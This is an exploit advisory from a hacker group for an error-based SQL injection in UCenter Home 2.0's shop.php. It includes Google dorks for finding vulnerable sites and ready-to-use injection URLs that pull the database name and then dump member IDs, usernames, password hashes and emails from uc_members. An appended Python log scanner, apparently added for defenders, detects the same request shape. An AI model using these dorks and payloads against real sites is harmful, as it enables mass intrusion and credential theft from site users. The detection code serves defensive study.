__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

For inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB name : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
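
A defender-side check for the request shape described above, as an added example that is not part of the original advisory: it scans web access logs for shop.php?ac=view requests whose shopid is not a plain integer and flags those carrying fragments of the error-based payload. The combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line; the target may contain raw spaces.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Fragments of the error-based payload shape shown above, with whitespace removed.
MARKERS = ("information_schema", "floor(rand(", "groupby", "concat(")

def classify(log_line):
    """None for unrelated requests, else 'ok', 'non_numeric_shopid' or 'error_based_sqli'."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes values
    if params.get("ac") != ["view"] or "shopid" not in params:
        return None
    verdict = "ok"
    for value in params["shopid"]:
        if re.fullmatch(r"\d{1,10}", value):
            continue  # a plain integer id, which is all this parameter should carry
        # Drop whitespace and /**/ comments so spacing tricks do not hide the markers.
        flat = re.sub(r"/\*.*?\*/|\s+", "", value.lower())
        if any(marker in flat for marker in MARKERS):
            return "error_based_sqli"
        verdict = "non_numeric_shopid"
    return verdict

def scan(lines):
    """Return (source_ip, verdict) for every suspicious shop.php request."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict not in (None, "ok"):
            hits.append((line.split(" ", 1)[0], verdict))
    return hits

# Constructed sample lines (documentation IP ranges, made-up timestamps and sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2011:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2011:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2011:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 700',
    '198.51.100.4 - - [01/Jan/2011:10:01:00 +0000] "GET /shop.php?ac=view&shopid=253 and 1=1 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

On the application side, the same integer test applied to shopid before it reaches the query is what removes the injection point; the log scan only shows who has been probing it.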